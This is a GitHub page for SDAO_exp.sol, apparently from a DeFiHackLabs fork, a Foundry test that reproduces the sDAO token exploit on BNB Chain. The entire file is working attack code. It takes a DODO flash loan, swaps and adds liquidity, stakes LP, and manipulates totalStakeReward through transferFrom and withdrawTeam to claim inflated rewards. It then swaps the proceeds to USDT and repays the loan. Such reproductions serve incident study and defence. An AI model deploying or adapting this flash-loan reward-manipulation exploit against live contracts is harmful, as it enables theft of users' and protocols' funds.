forked from zhouxianyuan/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 2
/
SDAO_exp.sol
112 lines (98 loc) · 4 KB
/
SDAO_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
// @Analysis
// https://twitter.com/8olidity/status/1594693686398316544
// https://twitter.com/CertiKAlert/status/1594615286556393478
// @TX
// https://bscscan.com/tx/0xb3ac111d294ea9dedfd99349304a9606df0b572d05da8cedf47ba169d10791ed
interface sDAO is IERC20{
function stakeLP(uint256 _lpAmount) external;
function withdrawTeam(address _token) external;
function getPerTokenReward() external view returns(uint);
function userLPStakeAmount(address account) external view returns(uint);
function userRewardPerTokenPaid(address account) external view returns(uint);
function totalStakeReward() external view returns(uint);
function lastTotalStakeReward() external view returns(uint);
function pendingToken(address account) external view returns(uint);
function getReward() external;
}
contract ContractTest is DSTest{
IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
sDAO SDAO = sDAO(0x6666625Ab26131B490E7015333F97306F05Bf816);
Uni_Router_V2 Router = Uni_Router_V2(0x10ED43C718714eb63d5aA57B78B54704E256024E);
Uni_Pair_V2 Pair = Uni_Pair_V2(0x333896437125fF680f146f18c8A164Be831C4C71);
address dodo = 0x26d0c625e5F5D6de034495fbDe1F6e9377185618;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("bsc", 23241440);
}
function testExploit() public{
USDT.approve(address(Router), type(uint).max);
SDAO.approve(address(Router), type(uint).max);
Pair.approve(address(Router), type(uint).max);
Pair.approve(address(SDAO), type(uint).max);
SDAO.approve(address(this), type(uint).max);
DVM(dodo).flashLoan(0, 500 * 1e18, address(this), new bytes(1));
emit log_named_decimal_uint(
"[End] Attacker USDT balance after exploit",
USDT.balanceOf(address(this)),
18
);
}
function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external{
USDTToSDAO();
addUSDTsDAOLiquidity();
SDAO.stakeLP(Pair.balanceOf(address(this)) / 2);
// SDAO.transfer(address(Pair), SDAO.balanceOf(address(this)));
SDAO.transferFrom(address(this), address(Pair), SDAO.balanceOf(address(this))); // change totalStakeReward > lastTotalStakeReward
SDAO.withdrawTeam(address(Pair));
Pair.transfer(address(SDAO), 13 * 1e15);
// uint total = SDAO.totalStakeReward();
// uint lasttotal =SDAO.lastTotalStakeReward();
// uint stake = SDAO.userLPStakeAmount(address(this));
// uint paid = SDAO.userRewardPerTokenPaid(address(this));
// uint reward = SDAO.getPerTokenReward();
// uint pending = SDAO.pendingToken(address(this));
SDAO.getReward();
SDAOToUSDT();
USDT.transfer(dodo, 500 * 1e18);
}
function USDTToSDAO() internal {
address [] memory path = new address[](2);
path[0] = address(USDT);
path[1] = address(SDAO);
Router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
250 * 1e18,
0,
path,
address(this),
block.timestamp + 60
);
}
function addUSDTsDAOLiquidity() internal{
Router.addLiquidity(
address(USDT),
address(SDAO),
USDT.balanceOf(address(this)),
SDAO.balanceOf(address(this)) / 2,
0,
0,
address(this),
block.timestamp + 60
);
}
function SDAOToUSDT() internal {
address [] memory path = new address[](2);
path[0] = address(SDAO);
path[1] = address(USDT);
Router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
SDAO.balanceOf(address(this)),
0,
path,
address(this),
block.timestamp + 60
);
}
}